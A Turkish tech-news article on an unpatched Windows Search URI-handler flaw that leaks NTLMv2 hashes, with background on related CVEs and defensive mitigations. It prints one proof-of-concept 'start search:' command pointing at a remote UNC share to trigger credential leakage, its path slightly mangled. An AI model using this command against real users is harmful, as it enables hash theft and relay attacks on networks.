Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Yazı Tipi BoyutlandırıcıAa
  • Anasayfa
  • Teknoloji
    • Siber Güvenlik
    • Yapay Zeka
    • Donanım
    • Bilim
  • Yazılım
  • Savunma & İstihbarat
  • Oyun
  • Yaşam
    • Finans
    • Sinema
    • Dünyadan Haberler
  • İş Birliği
Okuma: Acil! Yamalanmamış Windows Arama Açığı NTLMv2 Hash’lerini Çalıyor
Paylaş
Yazı Tipi BoyutlandırıcıAa
Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Ara
Bizi Takip Et
  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti
© 2026 Teknomers. All Rights Reserved.

Anasayfa » Acil! Yamalanmamış Windows Arama Açığı NTLMv2 Hash’lerini Çalıyor

Siber Güvenlik

Acil! Yamalanmamış Windows Arama Açığı NTLMv2 Hash’lerini Çalıyor

teknomers
Son güncelleme: 3 Haziran 2026 13:48
teknomers
Paylaş
Paylaş

NTLMv2 Hash Sızıntısı: Tehdit ve Önemi

Cybersecurity alanında araştırmacılar, kullanıcıların NTLMv2 hash’lerinin sızdırılmasına yol açabilecek yamanmamış bir güvenlik açığını gün yüzüne çıkardılar. Bu durum, kullanıcı gizliliği ve ağ güvenliği açısından büyük bir tehdit oluşturmaktadır.

Saldırı Nasıl Çalışıyor?

Mevcut açığın kaynaklandığı yer, Windows Snipping Tool’ün CVE-2026-33829 numaralı güvenlik açığı ile benzerlik göstermektedir. https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler kaynaklı bilgilere göre, sorun “search:” URI yöneticisi ile ilişkilidir. Özellikle, bu URI yöneticisi “filePath” parametresini kabul ediyor ve bu parametreyi doğrulamıyor. Sonuç olarak, saldırganlar belirtilen herhangi bir Universal Naming Convention (UNC) yoluna bağlanarak NTLM kimlik doğrulaması yapabiliyorlar.

start "" "search:query=test&crumb=location:\10.0.1.100share"

Etkilenen Sistemler

Bu güvenlik açığı, özellikle aşağıdaki sistemleri etkileyebilir:

  • Windows işletim sistemleri
  • Windows Snipping Tool ve diğer URI yöneticileri

Ayrıca, CVE-2023-35636 kapsamında “crumb” parametresi kullanılarak benzer NTLM sızıntıları daha önce belgelenmiştir. Varonis, bu durumu Şubat 2024’te raporlamıştır.

Çözüm ve Korunma

Bir tehdit aktörü, yakalanan hash’i kullanarak relay saldırıları gerçekleştirebilir ve bir ağda daha derin erişim elde edebilir. Microsoft, 15 Nisan 2026’da durumu sorumlu bir şekilde bildirip mevcut problemi çözmeyi reddetti ve yalnızca “Önemli” ve “Kritik” seviyesindeki sorunları ele alacaklarına vurgu yaptı.

Mevcut çözüm önerileri şunlardır:

  • Ağda outbound SMB (TCP/445 ve TCP/139) trafiğini engelleyin.
  • Yakaladığınız hash’lerin iç hizmetlere karşı relay edilmesini önlemek için SMB imzalamayı zorunlu hale getirin.
  • Mümkünse NTLM‘yi devre dışı bırakın.

Sonuç

Kullanıcıların ve sistem yöneticilerinin, bu güvenlik açığını göz önünde bulundurarak sistemlerini güncellemeleri, gerektiğinde portları kapatmaları ve sızdırma riskini minimize etmek için yukarıda belirtilen önlemleri almaları kritik bir önem taşımaktadır. Tedbir almak, olası saldırılara karşı önlem almak için atılacak en doğru adımdır.

Etkili ‘MagicWeb’ Kötü Amaçlı Yazılım, AD FS Kimlik Doğrulamasını Bozuyor, Microsoft Uyarıyor
Seul Casusları Kuzey Koreli Hackerların Yarı İletken Sırlarını Çaldığını Söyledi
Apple, Hedefli Saldırılarda Kullanılan İki Kritik Güvenlik Açığını Kapatmak için Acil Güncellemeler Yayınladı
Acil! n8n Kritik Açığı: Kimlik Doğrulama Olmadan Kontrol Ele Geçirme
Büyük bir Telegram güncellemesi yayınlandı: ortaklık programları, yapay zeka ve kolajlar kullanarak çıkartma arama
ETİKETLENDİ:AcilAçığıAramaçalıyorHashleriniNTLMv2Windowsyamalanmamış
Bu Makaleyi Paylaş
Facebook Bağlantıyı Kopyala Yazdır
Paylaş
Önceki Makale Dünyanın En Büyük Özel Lazerinin Işığı Yandı
Sonraki Makale Control Resonant Fragmanı Yayınlandı: En İyi Karakterin Dönüşü Bekleniyor

Sanal Medya

FacebookBeğen
452Takip Et
PinterestSabitle
237Takip Et

Son Eklenenler

Apple’ın Yeni AirPods’unda Neden Kamera Olabilir? Gizemli Kullanım Alanları!
Genel
Indiana belediye başkanının yapay zeka merkezi protestocuları hakkında skandal sözleri
Donanım
Yeni Steam Makinesi ve Steam Çerçevesi Yaz İçin Geliyor
Oyun
Acil: Hack’ler Everest Forms Pro Açığından WordPress Sitelerini Ele Geçiriyor!
Siber Güvenlik
Laravel Kuyruk Mimarisi: Üretimde Arka Plan İşlemleri için Cron Görevlerini Kullanmayı Neden Bıraktım
Yazılım
Yapay Zeka Serif Fontları Ele Geçiriyor: Neden Bu Değişim Oluyor?
Genel
//

Siber güvenlik, yapay zeka ve savunma sanayiinden; finans ve sinema dünyasına uzanan geniş bir yelpaze. Teknomers; teknoloji, strateji ve yazılım dünyasını sade bir dille sizlerle buluşturuyor.

Kurumsal

  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti

Kategoriler

  • Teknoloji
  • Oyun
  • Sinema
  • Siber Güvenlik
  • Bilim
  • Finans
  • Dünyadan Güncel Haberler

Populer

  • TV'de Ücretsiz İzlenebilen Şifresiz Erotik Kanallar (2025 Güncel Frekans Listesi)

  • The Last of Us PC Kontrolleri: Hızlı Silah Değiştirme ve Tüm Tuşlar (2025)

  • Hogwarts Legacy'de Odaklanma İksiri Nasıl Yapılır?

Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Bizi Takip Et
© 2026 Teknomers. All Rights Reserved.
Welcome Back!

Sign in to your account

Kullanıcı Adı veya E-posta Adresi
Şifre

Şifrenizi mi unuttunuz?